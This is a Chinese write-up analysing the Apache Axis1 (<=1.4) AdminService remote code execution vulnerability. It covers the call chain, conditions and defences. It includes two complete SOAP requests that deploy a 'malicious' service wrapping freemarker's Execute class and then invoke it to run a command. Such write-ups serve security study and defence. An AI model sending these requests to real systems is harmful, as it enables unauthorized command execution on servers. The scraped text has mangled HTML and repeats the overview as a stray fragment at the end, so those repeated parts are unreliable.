Apache Axis1 (<=1.4版本) 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Apache Axis1 (版本<=1.4) 存在一个远程代码执行漏洞，攻击者可以通过构造特殊的SOAP请求，利用AdminService服务未授权访问和配置修改功能，最终实现任意命令执行。<\/p>

漏洞原理<\/h2>

核心流程<\/h3>

第一次请求<\/strong>：<\/p>

org.apache.axis.transport.http.AxisServlet#doPost<\/code><\/li>
→ org.apache.axis.utils.Admin#processWSDD<\/code><\/li>
→ org.apache.axis.AxisEngine#saveConfiguration<\/code><\/li> <\/ul> <\/li>
第二次请求<\/strong>：<\/p> org.apache.axis.transport.http.AxisServlet#doPost<\/code><\/li> → freemarker.template.utility.Execute#exec<\/code><\/li> → java.lang.Runtime#exec(java.lang.String)<\/code><\/li> <\/ul> <\/li> <\/ol> 关键点分析<\/h3> 未授权访问<\/strong>：<\/p> 默认情况下，AdminService<\/code>服务的enableRemoteAdmin<\/code>参数为false，只允许本地访问<\/li> 如果该参数被设置为true，则允许远程访问<\/li> <\/ul> <\/li> 配置修改<\/strong>：<\/p> 通过构造特殊的SOAP请求，可以修改WEB-INF\/server-config.wsdd<\/code>配置文件<\/li> 攻击者可以添加自定义的WebService服务<\/li> <\/ul> <\/li> 命令执行<\/strong>：<\/p> 利用freemarker.template.utility.Execute<\/code>类作为WebService服务<\/li> 调用其exec<\/code>方法执行任意命令<\/li> <\/ul> <\/li> <\/ol> 环境准备<\/h2> JDK 1.8_191<\/li> Apache Axis1 1.4<\/li> Tomcat 6<\/li> freemarker-2.3.23.jar (需要手动添加到WEB-INF\/lib目录)<\/li> <\/ul> 漏洞复现步骤<\/h2> 第一步：修改配置添加恶意服务<\/h3> 构造POST请求到\/services\/AdminService<\/code>，添加一个自定义服务：<\/p> POST \/services\/AdminService HTTP\/1.1 <\/span><\/span>Host: target.com <\/span><\/span>Content-Type: application\/xml <\/span><\/span> <\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> xmlns:xsd=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>><\/span> <\/span><\/span> <soapenv:Body><\/span> <\/span><\/span> <deployment<\/span> xmlns=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/"<\/span> xmlns:java=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/providers\/java"<\/span>><\/span> <\/span><\/span> <service<\/span> name=<\/span>"malicious"<\/span> provider=<\/span>"java:RPC"<\/span>><\/span> <\/span><\/span> <parameter<\/span> name=<\/span>"className"<\/span> value=<\/span>"freemarker.template.utility.Execute"<\/span>\/><\/span> <\/span><\/span> <parameter<\/span> name=<\/span>"allowedMethods"<\/span> value=<\/span>"exec"<\/span>\/><\/span> <\/span><\/span> <\/service><\/span> <\/span><\/span> <\/deployment><\/span> <\/span><\/span> <\/soapenv:Body><\/span> <\/span><\/span><\/soapenv:Envelope><\/span> <\/span><\/span><\/code><\/pre>第二步：调用恶意服务执行命令<\/h3> 构造POST请求到新创建的\/services\/malicious<\/code>服务：<\/p> POST \/services\/malicious HTTP\/1.1 <\/span><\/span>Host: target.com <\/span><\/span>Content-Type: application\/xml <\/span><\/span> <\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> xmlns:xsd=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>><\/span> <\/span><\/span> <soapenv:Body><\/span> <\/span><\/span> <exec><\/span> <\/span><\/span> <string><\/span>calc<\/string><\/span> <\/span><\/span> <\/exec><\/span> <\/span><\/span> <\/soapenv:Body><\/span> <\/span><\/span><\/soapenv:Envelope><\/span> <\/span><\/span><\/code><\/pre>技术细节<\/h2> 关键代码分析<\/h3> AdminService处理流程<\/strong>：<\/p> \/\/ org.apache.axis.utils.Admin#AdminService <\/span><\/span><\/span><\/span>public<\/span> AdminService<\/span>()<\/span> {<\/span> <\/span><\/span> allowedMethods =<\/span> new<\/span> Vector();<\/span> <\/span><\/span> allowedMethods.<\/span>add<\/span>(<\/span>"AdminService"<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 配置保存流程<\/strong>：<\/p> \/\/ org.apache.axis.utils.Admin#processWSDD <\/span><\/span><\/span><\/span>WSDDDocument wsddDoc =<\/span> new<\/span> WSDDDocument(<\/span>root);<\/span> <\/span><\/span>EngineConfiguration config =<\/span> engine.<\/span>getConfig<\/span>();<\/span> <\/span><\/span>if<\/span> (<\/span>config instanceof<\/span> WSDDEngineConfiguration)<\/span> {<\/span> <\/span><\/span> WSDDDeployment deployment =<\/span> ((<\/span>WSDDEngineConfiguration)<\/span>config).<\/span>getDeployment<\/span>();<\/span> <\/span><\/span> wsddDoc.<\/span>deploy<\/span>(<\/span>deployment);<\/span> <\/span><\/span>}<\/span> <\/span><\/span>engine.<\/span>refreshGlobalOptions<\/span>();<\/span> <\/span><\/span>engine.<\/span>saveConfiguration<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> 命令执行类<\/strong>：<\/p> \/\/ freemarker.template.utility.Execute <\/span><\/span><\/span><\/span>public<\/span> class<\/span> Execute<\/span> {<\/span> <\/span><\/span> public<\/span> Execute<\/span>()<\/span> {<\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> Object exec<\/span>(<\/span>List arguments)<\/span> {<\/span> <\/span><\/span> String command =<\/span> (<\/span>String)<\/span>arguments.<\/span>get<\/span>(<\/span>0<\/span>);<\/span> <\/span><\/span> \/\/ 执行命令... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御措施<\/h2> 升级到最新版本<\/strong>：Apache Axis1已发布修复版本<\/li> 配置防护<\/strong>：确保WEB-INF\/server-config.wsdd<\/code>中AdminService<\/code>的enableRemoteAdmin<\/code>参数为false<\/li> 限制对\/services\/AdminService<\/code>的访问<\/li> <\/ul> <\/li> 网络防护<\/strong>：使用防火墙规则限制对Axis服务的访问<\/li> 部署WAF规则拦截恶意SOAP请求<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该漏洞的核心在于：<\/p> AdminService的未授权访问<\/li> 配置文件的动态修改能力<\/li> 通过添加恶意服务实现任意命令执行<\/li> <\/ol> 利用此漏洞需要满足以下条件：<\/p> 目标系统使用Apache Axis1 <=1.4版本<\/li> enableRemoteAdmin<\/code>参数被设置为true或攻击者能够访问本地服务<\/li> 类路径中包含可利用的类(如freemarker的Execute类)<\/li> <\/ol>

Apache Axis1 (<=1.4版本) 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> Apache Axis1 (版本<=1.4) 存在一个远程代码执行漏洞，攻击者可以通过构造特殊的SOAP请求，利用AdminService服务未授权访问和配置修改功能，最终实现任意命令执行。<\/p>

漏洞原理<\/h2>

漏洞复现步骤<\/h2>

技术细节<\/h2>

漏洞概述<\/h2>
Apache Axis1 (版本<=1.4) 存在一个远程代码执行漏洞，攻击者可以通过构造特殊的SOAP请求，利用AdminService服务未授权访问和配置修改功能，最终实现任意命令执行。<\/p>